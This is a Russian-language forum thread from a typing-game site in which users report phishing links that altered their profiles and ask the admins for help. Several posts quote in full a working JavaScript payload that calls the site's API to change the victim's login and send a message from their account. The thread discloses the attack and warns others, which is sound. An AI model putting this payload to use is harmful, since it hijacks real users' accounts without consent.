[{{mminutes}}:{{sseconds}}] X
Пользователь приглашает вас присоединиться к открытой игре игре с друзьями .
Все форумы

Форум «Техцентр» / Фишинговые сообщения с изменением профиля

Rainbo Сообщение #1 28 мая 2022 в 13:35
Профи
1
Пришло сообщение на почту, с ссылкой на определенный раздел, при переходе с моего счета были переведены очки изменен профиль, если увидите данные сообщения, не в коем случае не переходите
Rainbo Сообщение #2 28 мая 2022 в 13:38
Профи
1
https://prnt.sc/hZ4hmxThps9w
Rainbo Сообщение #3 28 мая 2022 в 13:39
Профи
1
https://prnt.sc/dx_EL_LhBMiH
Игрок3 Сообщение #4 28 мая 2022 в 14:57
Организатор событий
32
https://klavogonki.ru/wiki/Справка:Спам
ss98 Сообщение #5 28 мая 2022 в 21:03
Маньяк
18
вот такое сообщение пришло


в ссылке js-код, который меняет ник:
java script: { let changenick = new XMLHttpRequest(); changenick.open("POST", location.protocol.substr ( 0,location.protocol.indexOf(':')) +"://klavogonki.ru/api/profile/change-login"); changenick.setRequestHeader("Accept", "application/json"); changenick.setRequestHeader("Content-Type", "application/json"); let nickdata = '{"newLogin": "%D1%8F_%D0%B5%D0%B1%D0%BB%D0%B0%D0%BD_1509"}'; changenick.send(nickdata); for(var i = 0; i < 20000000; ++i) { i++; } let sendcallback = new XMLHttpRequest(); sendcallback.open("POST", location.protocol.substr ( 0,location.protocol.indexOf(':')) + "://klavogonki.ru/api/profile/send-message"); sendcallback.setRequestHeader("Accept", "application/json"); sendcallback.setRequestHeader("Content-Type", "application/json"); let callbackdata = '{"respondentId": "709353", "text": "%D0%A1%D0%BB%D1%83%D1%88%D0%B0%D1%8E%D1%81%D1%8C!"}'; sendcallback.send(callbackdata); }


я уже давно отвык от js в сообщениях, лет 15 как все ресурсы фильтруют подобное содержимое. может администрация вернуть очки и ник как было?
Шось Сообщение #6 28 мая 2022 в 21:18
Маньяк
50
ss98 писал(а):
вот такое сообщение пришло


в ссылке js-код, который меняет ник:
java script: { let changenick = new XMLHttpRequest(); changenick.open("POST", location.protocol.substr ( 0,location.protocol.indexOf(':')) +"://klavogonki.ru/api/profile/change-login"); changenick.setRequestHeader("Accept", "application/json"); changenick.setRequestHeader("Content-Type", "application/json"); let nickdata = '{"newLogin": "%D1%8F_%D0%B5%D0%B1%D0%BB%D0%B0%D0%BD_1509"}'; changenick.send(nickdata); for(var i = 0; i < 20000000; ++i) { i++; } let sendcallback = new XMLHttpRequest(); sendcallback.open("POST", location.protocol.substr ( 0,location.protocol.indexOf(':')) + "://klavogonki.ru/api/profile/send-message"); sendcallback.setRequestHeader("Accept", "application/json"); sendcallback.setRequestHeader("Content-Type", "application/json"); let callbackdata = '{"respondentId": "709353", "text": "%D0%A1%D0%BB%D1%83%D1%88%D0%B0%D1%8E%D1%81%D1%8C!"}'; sendcallback.send(callbackdata); }


я уже давно отвык от js в сообщениях, лет 15 как все ресурсы фильтруют подобное содержимое. может администрация вернуть очки и ник как было?

Мне такое же пришло (
Последний раз отредактировано 29 мая 2022 в 21:43 пользователем Nowhereman42nd
липофрения Сообщение #7 28 мая 2022 в 21:54
Новичок
7
зачем вы поставили такие ники
Игрок3 Сообщение #8 28 мая 2022 в 21:59
Организатор событий
32
Это всё спамер!
Debugger Сообщение #9 28 мая 2022 в 22:05
Маньяк
50
И я нажал (
Ник разрешает менять только раз в два месяца, так что обратно поменять не могу.
Админы, можете посодействовать?
Желательно было бы, чтоб изменения логина/пароля шли только с подтверждением письмом...
липофрения Сообщение #10 28 мая 2022 в 22:09
Новичок
7
Игрок3 писал(а):
Это всё спамер!

как он может поставить если он просто спамит
липофрения Сообщение #11 28 мая 2022 в 22:09
Новичок
7
ребят что с никами у вас флешмоб чтоль
Da_f Сообщение #12 28 мая 2022 в 22:24
Гонщик
27
ss98 писал(а):
вот такое сообщение пришло


в ссылке js-код, который меняет ник:
java script: { let changenick = new XMLHttpRequest(); changenick.open("POST", location.protocol.substr ( 0,location.protocol.indexOf(':')) +"://klavogonki.ru/api/profile/change-login"); changenick.setRequestHeader("Accept", "application/json"); changenick.setRequestHeader("Content-Type", "application/json"); let nickdata = '{"newLogin": "%D1%8F_%D0%B5%D0%B1%D0%BB%D0%B0%D0%BD_1509"}'; changenick.send(nickdata); for(var i = 0; i < 20000000; ++i) { i++; } let sendcallback = new XMLHttpRequest(); sendcallback.open("POST", location.protocol.substr ( 0,location.protocol.indexOf(':')) + "://klavogonki.ru/api/profile/send-message"); sendcallback.setRequestHeader("Accept", "application/json"); sendcallback.setRequestHeader("Content-Type", "application/json"); let callbackdata = '{"respondentId": "709353", "text": "%D0%A1%D0%BB%D1%83%D1%88%D0%B0%D1%8E%D1%81%D1%8C!"}'; sendcallback.send(callbackdata); }


я уже давно отвык от js в сообщениях, лет 15 как все ресурсы фильтруют подобное содержимое. может администрация вернуть очки и ник как было?

А кроме смены ника этот скрипт ничего не делает? Я с дуру нажал, но у меня очков мало, поэтому ник не изменился-)
Последний раз отредактировано 29 мая 2022 в 21:43 пользователем Nowhereman42nd
липофрения Сообщение #13 28 мая 2022 в 22:28
Новичок
7
ааа так он ники меняет сам а как он зделал ну меняйте ребят обратно
Debugger Сообщение #14 28 мая 2022 в 22:40
Маньяк
50
Da_f, Кроме смены логина ("change-login") еще отправляет письмо с этим респондентом и содержимым "Слушаюсь!".

липофрения, Судя по профилю и высказываниям, предположу, что это организатор объявился. Ну, чем больше комплексов, тем больше необходимость в самоутверждении.
ТОМА-АТОМНАЯ Сообщение #15 29 мая 2022 в 13:09
Организатор событий
116
Профиль Администрация не забаненя, он продолжает рассылать
Alex123451 Сообщение #17 29 мая 2022 в 13:44
Супермен
17
Я тоже нажал, помогите пожалуйста, что можно в целом сделать?
липофрения Сообщение #18 29 мая 2022 в 13:47
Новичок
7
Debugger писал(а):
Da_f, Кроме смены логина ("change-login") еще отправляет письмо с этим респондентом и содержимым "Слушаюсь!".

липофрения, Судя по профилю и высказываниям, предположу, что это организатор объявился. Ну, чем больше комплексов, тем больше необходимость в самоутверждении.

я великий тайпер
Последний раз отредактировано 29 мая 2022 в 21:44 пользователем Nowhereman42nd
Твой_кум Сообщение #19 29 мая 2022 в 13:47
Новичок
1
Ждать, пока админы исправят это безобразие. Обратно переименоваться самому не получится, так как есть ограничение в два месяца.
ss98 Сообщение #21 29 мая 2022 в 14:54
Маньяк
18
прошли уже сутки с момента первых случаев и не видно никакой реакции от администрации, что случилось? неужели потерян контроль над сайтом?
вместе с отсутствием действий стало очевидно, что на сайте ужасные дыры в безопасности и неизвестно откуда прилетит в следующий раз, и я так понимаю, что их никто не собирается закрывать. бида
Debugger Сообщение #22 29 мая 2022 в 15:12
Маньяк
50
ss98 писал(а):
прошли уже сутки с момента первых случаев

Прошло уже... много времени с первых случаев. Просто раньше скриптами только рассылался спам и снимались очки, а вчера добавилась функция смены логина. Посмотрим, что добавится дальше.

Добавлено позже:
Обшибочка вышла. Я полагал, что позволяются скрипты, но просмотр кода показал, что тут игра с адресами картинок.
Последний раз отредактировано 29 мая 2022 в 21:44 пользователем Nowhereman42nd

Чтобы писать в форуме, нужно зарегистрироваться.

Связаться
Выделить
Выделите фрагменты страницы, относящиеся к вашему сообщению
Скрыть сведения
Скрыть всю личную информацию
Отмена